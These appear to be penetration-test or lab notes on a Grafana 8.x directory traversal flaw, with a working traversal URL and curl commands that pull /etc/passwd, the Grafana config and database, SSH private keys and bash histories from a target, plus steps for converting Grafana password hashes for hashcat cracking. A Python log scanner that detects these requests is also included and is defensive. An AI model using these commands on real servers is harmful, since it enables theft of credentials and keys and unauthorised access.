Grafana
Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read
http://10.10.99.76:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Grafana Conf File
/etc/grafana/grafana.ini

Interesting LFI Files
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../etc/passwd -o passwd
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../etc/grafana/grafana.ini -o grafana.ini
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../root/.ssh/id_rsa
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../root/.bash_history
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../home/grafana/.ssh/id_rsa
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../home/grafana/.bash_history
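
The detection side of the requests above, as an added example that is not part of the original notes: it scans access-log lines for /public/plugins/<id>/ requests whose decoded path resolves outside the plugin directory. The combined-style proxy log format, the client addresses and the sample lines are constructed assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

# Request line of a combined-format access log entry (assumed reverse-proxy format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PLUGIN_PREFIX = "/public/plugins/"

# Constructed sample lines: literal ../, ..%2F, double-encoded, and two benign requests.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /public/plugins/mysql/../../../../../../../../etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /public/plugins/mysql/..%2F..%2F..%2Fetc%2Fgrafana%2Fgrafana.ini HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /public/plugins/mysql/img/logo.svg HTTP/1.1" 200 900',
    '192.0.2.10 - - [01/Jan/2024:10:01:05 +0000] "GET /api/health HTTP/1.1" 200 70',
    '198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "GET /public/plugins/mysql/%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0',
]


def decoded_path(target):
    """Drop the query string and percent-decode until stable (catches double encoding)."""
    path = target.split("?", 1)[0]
    for _ in range(5):
        nxt = unquote(path)
        if nxt == path:
            break
        path = nxt
    return path.replace("\\", "/")


def escapes_plugin_dir(target):
    """True if the path starts under /public/plugins/<id>/ but resolves outside it."""
    path = decoded_path(target)
    if not path.startswith(PLUGIN_PREFIX):
        return False
    plugin_id = path[len(PLUGIN_PREFIX):].split("/", 1)[0]
    root = (PLUGIN_PREFIX + plugin_id).rstrip("/")
    resolved = posixpath.normpath(path)
    return not (resolved == root or resolved.startswith(root + "/"))


def find_traversal(log_lines):
    # Returns (client, HTTP status, resolved path) for every flagged request.
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and escapes_plugin_dir(m["target"]):
            resolved = posixpath.normpath(decoded_path(m["target"]))
            hits.append((line.split()[0], m["status"], resolved))
    return hits
```

A 200 status on a flagged line means the file was served, so those entries are the ones to triage first.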

Grafana2Hashcat
We can convert the hashes from Grafana to hashcat format using this tool.
Hashes should be in this format:
HASH,SALT
python3 grafana2hashcat.py grafana_hashes.txt -o output-hash.txt
